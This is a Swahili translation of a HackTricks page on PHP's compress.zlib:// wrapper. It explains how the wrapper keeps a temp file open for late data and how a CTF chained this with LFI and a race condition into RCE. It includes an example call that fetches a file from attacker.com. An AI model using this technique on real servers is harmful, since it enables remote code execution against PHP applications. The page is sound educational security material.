5.3 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure kuchunguza ikiwa kampuni au wateja wake wame vamiwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:
{% embed url="https://whiteintel.io" %}
compress.zlib://
na PHP_STREAM_PREFER_STDIO
Faili iliyofunguliwa kwa kutumia itifaki ya compress.zlib://
na bendera PHP_STREAM_PREFER_STDIO
inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.
Hii inamaanisha kwamba wito kama huu:
file_get_contents("compress.zlib://http://attacker.com/file")
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuendelea kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.
Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:
/* Use a tmpfile and copy the old streams contents into it */
if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}
Mashindano ya Kukimbia hadi RCE
CTF hii ilishinduliwa kwa kutumia hila iliyotangulia.
Mshambuliaji atafanya seva ya mwathiriwa ifungue uhusiano ikisoma faili kutoka kwa seva za mshambuliaji kwa kutumia itifaki ya compress.zlib
.
Wakati huu uhusiano ukiwepo mshambuliaji atafanya kuvuja njia ya faili ya muda iliyoundwa (inavuja na seva).
Wakati huo uhusiano bado ukiwa wazi, mshambuliaji atatumia LFI kwa kupakia faili ya muda ambayo anadhibiti.
Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao unazuia kupakia faili zinazohusu <?
. Kwa hivyo, mshambuliaji atatumia Mashindano ya Kukimbia. Katika uhusiano ambao bado uko wazi mshambuliaji atatuma mzigo wa PHP BAADA YA wavuti kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini KABLA haijapakia maudhui yake.
Kwa habari zaidi angalia maelezo ya Mashindano ya Kukimbia na CTF katika https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer
WhiteIntel
WhiteIntel ni injini ya utaftaji inayotumiwa na dark-web inayotoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:
{% embed url="https://whiteintel.io" %}
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.